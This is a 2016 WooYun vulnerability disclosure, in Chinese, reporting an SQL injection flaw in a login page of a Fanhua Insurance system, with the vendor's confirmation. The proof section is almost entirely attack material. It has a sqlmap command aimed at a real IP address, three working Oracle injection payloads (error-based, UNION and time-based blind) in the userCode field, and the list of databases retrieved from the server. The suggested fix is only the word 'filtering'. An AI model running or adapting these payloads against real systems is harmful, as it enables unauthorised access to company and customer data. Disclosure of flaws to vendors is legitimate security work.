当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0197748

漏洞标题:泛华保险某系统存在SQL注入漏洞

相关厂商:泛华保险服务集团

漏洞作者: 路人甲

提交时间:2016-04-18 11:40

修复时间:2016-06-04 15:20

公开时间:2016-06-04 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-18: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

泛华保险某系统存在SQL注入漏洞

详细说明:

存在漏洞服务器
http://219.141.188.35/biportal

漏洞证明:

python sqlmap.py -u "http://219.141.188.35/biportal/verifyLogin" --data "systemValidType=cognosLogin&userCode=test&actionType=login&userPassword=123456" -p userCode --dbms 'Oracle'


---
Parameter: userCode (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: systemValidType=cognosLogin&userCode=test' AND 9278=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(118)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9278=9278) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'KhpS'='KhpS&actionType=login&userPassword=123456
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: systemValidType=cognosLogin&userCode=test' UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(118)||CHR(122)||CHR(113)||CHR(66)||CHR(104)||CHR(108)||CHR(117)||CHR(89)||CHR(69)||CHR(122)||CHR(116)||CHR(66)||CHR(72)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113) FROM DUAL-- &actionType=login&userPassword=123456
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: systemValidType=cognosLogin&userCode=test' AND 3861=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'QCVT'='QCVT&actionType=login&userPassword=123456


available databases [20]:                                                                                                                    
[*] BIPORTAL
[*] COGNOS
[*] COGNOS1
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DW
[*] EXFSYS
[*] MDSYS
[*] ODS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-20 15:13

厂商回复:

非常感谢!

最新状态:

暂无